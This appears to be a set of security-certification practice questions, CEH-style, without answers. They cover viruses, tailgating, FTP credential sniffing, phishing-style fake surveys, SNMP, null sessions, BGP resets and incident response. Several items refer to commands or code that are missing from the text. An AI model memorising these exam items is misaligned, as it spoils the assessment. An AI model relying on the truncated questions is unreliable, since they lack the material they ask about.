Kyle is performing the final testing of an application he developed for the accounting department. His last round of testing is to ensure that the program is as secure as possible. Kyle runs the following command. What is he testing at this point?
You are running known exploits against your network to test for possible vulnerabilities. To test the strength of your virus software, you load a test network to mimic your production network. Your software successfully blocks some simple macro and encrypted viruses. You decide to really test the software by using virus code where the code rewrites itself entirely and the signatures change from child to child, but the functionality stays the same. What type of virus is this that you are testing?
What is a good security method to prevent unauthorized users from 'tailgating'?
You are the security analyst working for a private company out of France. Your current assignment is to obtain credit card information from a Swiss bank owned by that company. After initial reconnaissance, you discover that the bank security defenses are very strong and would take too long to penetrate. You decide to get the information by monitoring the traffic between the bank and one of its subsidiaries in London. After monitoring some of the traffic, you see a lot of FTP packets traveling back and forth. You want to sniff the traffic and extract usernames and passwords. What tool could you use to get this information?
As a security analyst you set up a false survey website that will require users to create a username and a strong password. You send the link to all the employees of the company. What information will you be able to gather?
Harold wants to set up a firewall on his network but is not sure which one would be the most appropriate. He knows he needs to allow FTP traffic to one of the servers on his network, but he wants to only allow FTP-PUT. Which firewall would be most appropriate for Harold's needs?
What will the following command accomplish? (Test ability of a router to handle over-sized packets)
What does ICMP Type 3/Code 13 mean?
Your company's network just finished going through a SAS 70 audit. This audit reported that overall, your network is secure, but there are some areas that need improvement. The major area was SNMP security. The audit company recommended turning off SNMP, but that is not an option since you have so many remote nodes to keep track of. What step could you take to help secure SNMP on your network?
After attending a CEH security seminar, you make a list of changes you would like to perform on your network to increase its security. One of the first things you change is to switch the RestrictAnonymous setting from 0 to 1 on your servers. This, as you were told, would prevent anonymous users from establishing a null session on the server. Using Userinfo tool mentioned at the seminar, you succeed in establishing a null session with one of the servers. Why is that?
In a virtual test environment, Michael is testing the strength and security of BGP using multiple routers to mimic the backbone of the Internet. This project will help him write his doctoral thesis on 'bringing down the Internet'. Without sniffing the traffic between the routers, Michael sends millions of RESET packets to the routers in an attempt to shut one or all of them down. After a few hours, one of the routers finally shuts itself down. What will the other routers communicate between themselves?
How many possible sequence number combinations are there in TCP/IP protocol?
Tyler is setting up a wireless network for his business that he runs out of his home. He has followed all the directions from the ISP as well as the wireless router manual. He does not have any encryption set and the SSID is being broadcast. On his laptop, he can pick up the wireless signal for short periods of time, but then the connection drops and the signal goes away. Eventually the wireless signal shows back up, but drops intermittently. What could be Tyler's issue with his home wireless network?
You are working on a thesis for your doctorate degree in Computer Science. Your thesis is based on HTML, DHTML, and other web-based languages and how they have evolved over the years. You navigate to archive.org and view the HTML code of news.com. You then navigate to the current news.com website and copy over the source code. While searching through the code, you come across something abnormal: What have you found?
Williams, a forensic specialist, was investigating a system suspected to be involved in a cybercrime. Williams collected the required evidence, eliminated the root cause of the incident, and closed all attack vectors. In which phase of incident response did Williams perform these tasks?
If you discover a criminal act while investigating a corporate policy abuse, it becomes a publicsector investigation and should be referred to law enforcement?